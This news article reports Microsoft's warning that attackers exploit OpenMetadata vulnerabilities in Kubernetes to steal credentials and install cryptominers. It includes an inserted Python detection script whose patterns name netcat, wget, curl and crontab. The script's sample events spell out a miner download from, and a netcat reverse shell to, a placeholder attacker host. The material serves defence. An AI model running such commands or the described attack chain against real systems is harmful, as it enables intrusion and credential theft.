Microsoft warns: cybercriminals exploit OpenMetadata flaws to mine cryptocurrency

2024/04/19 05:53

Unpatched OpenMetadata vulnerabilities disclosed in March are being actively exploited by malicious actors to gain access to Kubernetes environments and install cryptomining malware. The vulnerabilities allow attackers to bypass authentication, obtain remote code execution, and steal AWS credentials in order to mine cryptocurrency on the victim's resources. Microsoft recommends that administrators update their OpenMetadata images to the latest version and implement strong authentication to mitigate these risks.


Cybercriminals Exploit OpenMetadata Vulnerabilities to Mine Cryptocurrency, Microsoft Warns


In a chilling exposé, Microsoft has unveiled a disturbing trend: cybercriminals are actively exploiting vulnerabilities in OpenMetadata, an open-source software suite, to mine cryptocurrency at the expense of unsuspecting victims. The attacks, which have been ongoing since early April, target Kubernetes environments where OpenMetadata is deployed without the necessary security patches.


Unpatched OpenMetadata Systems: A Gateway for Malicious Actors


OpenMetadata vulnerabilities, disclosed in March, encompass a range of critical and high-severity flaws that can be exploited to bypass authentication and gain remote code execution (RCE) within OpenMetadata deployments. Microsoft's threat intelligence team has identified five specific CVEs that are being leveraged in these attacks:


  • CVE-2024-28255: Critical improper authentication vulnerability (CVSS: 9.8)
  • CVE-2024-28847: High-severity code-injection vulnerability (CVSS: 8.8)
  • CVE-2024-28253: Critical code-injection vulnerability (CVSS: 9.4)
  • CVE-2024-28848: High-severity code-injection vulnerability (CVSS: 8.8)
  • CVE-2024-28254: OS command injection vulnerability (CVSS: 8.8)

These vulnerabilities provide attackers with a gateway into vulnerable systems, allowing them to penetrate OpenMetadata containers and execute malicious commands. The attackers' primary objective is to surreptitiously mine cryptocurrency using the victims' computing resources.


The Attack Sequence: A Step-by-Step Account


The attack sequence begins with attackers scanning for Kubernetes-based deployments of OpenMetadata that are exposed to the internet. Once they identify vulnerable systems, they exploit the unpatched CVEs to gain access to the container. From there, they execute a series of commands to gather intelligence about the victim's environment, including network and hardware configuration, OS version, and active users.


"As part of the reconnaissance phase, the attackers read the environment variables of the workload," explained Microsoft security experts Hagai Ran Kestenberg and Yossi Weizman. "Those variables may contain connection strings and credentials for various services used for OpenMetadata operation, which could lead to lateral movement to additional resources."


Crypto-Malware Deployment and Remote Access


Once they have gained a foothold, the attackers download crypto-mining malware from a remote server in China. In some cases, the attackers have even left behind a desperate plea, hoping to evoke sympathy from their victims:


"Hi man. I've seen several organizations report my Trojan recently. Please let me go. I want to buy a car. That's all. I don't want to hurt others. I can't help it. My family is very poor. In China, it's hard to buy a suite. I don't have any accommodation. I don't want to do anything illegal. Really, really if you are interested, you can give me XMR, my address is…"


It remains unclear whether this sob story has swayed any victims into transferring Monero crypto-coins to the attackers.


After deploying the mining malware, the attackers establish a reverse shell connection using Netcat to maintain remote access to the container. Additionally, they install cronjobs for scheduling, ensuring that the malware will execute at predetermined times.

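The reconnaissance, payload download, Netcat reverse shell and cron persistence steps described above form a chain that a defender can look for in per-container process-execution events. The following is an added example, not code from Microsoft or from the article: it scores constructed sample events per pod (the `pod=... cmd=...` event format is an assumption) and flags a pod only when several stages of the chain appear together, so a lone `env` or `curl` in a healthy OpenMetadata pod does not fire.

```python
"""Flag pods whose process events match the OpenMetadata cryptomining chain.
Added example; the event format and the sample events are constructed."""
import re
from collections import defaultdict

# One pattern per stage of the attack sequence reported in the article.
STAGES = {
    "recon":    re.compile(r"\b(env|printenv|uname|ifconfig|ip addr|whoami|who|cat /proc/\S*/environ)\b"),
    "download": re.compile(r"\b(curl|wget)\b"),
    "revshell": re.compile(r"\b(nc|ncat|netcat)\b"),
    "persist":  re.compile(r"\bcrontab\b|/etc/cron"),
}
EVENT = re.compile(r"pod=(?P<pod>\S+)\s+cmd=(?P<cmd>.*)")

def stages_per_pod(events):
    """Return {pod: set(stage names)} for every event line that parses."""
    seen = defaultdict(set)
    for line in events:
        m = EVENT.search(line)
        if not m:
            continue  # constructed format; unparseable lines are ignored
        for name, pattern in STAGES.items():
            if pattern.search(m["cmd"]):
                seen[m["pod"]].add(name)
    return dict(seen)

def flag_pods(events):
    """Flag a pod only when the chain is nearly complete: reconnaissance,
    a payload download, and either the reverse shell or cron persistence."""
    flagged = {}
    for pod, stages in stages_per_pod(events).items():
        if "recon" in stages and "download" in stages and stages & {"revshell", "persist"}:
            flagged[pod] = sorted(stages)
    return flagged

# Constructed sample events: one pod showing the full chain, one pod whose
# env read and curl health check are normal operation (hosts are placeholders).
SAMPLE_EVENTS = [
    "pod=openmetadata-server-7d cmd=uname -a",
    "pod=openmetadata-server-7d cmd=env",
    "pod=openmetadata-server-7d cmd=wget http://attacker.invalid/miner -O /tmp/m",
    "pod=openmetadata-server-7d cmd=nc attacker.invalid 4444",
    "pod=openmetadata-server-7d cmd=crontab /tmp/job",
    "pod=openmetadata-ingest-2a cmd=env",
    "pod=openmetadata-ingest-2a cmd=curl https://internal.example/api/health",
]

if __name__ == "__main__":
    for pod, stages in flag_pods(SAMPLE_EVENTS).items():
        print(f"ALERT {pod}: stages {', '.join(stages)}")
```

In a real cluster the same scoring would run over runtime-security process events keyed by pod, and the reverse-shell and cron stages are the ones worth alerting on even in isolation.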

Protecting Against Crypto-Mining Exploits


Microsoft strongly urges administrators running OpenMetadata workloads in their Kubernetes clusters to ensure that the image is up to date. If OpenMetadata is exposed to the internet, strong authentication measures should be implemented, and default credentials should be avoided.


These vulnerabilities serve as a sobering reminder of the importance of timely security patching and the consequences of neglecting software updates. Organizations are advised to adopt a proactive approach to vulnerability management to mitigate the risks posed by malicious actors.

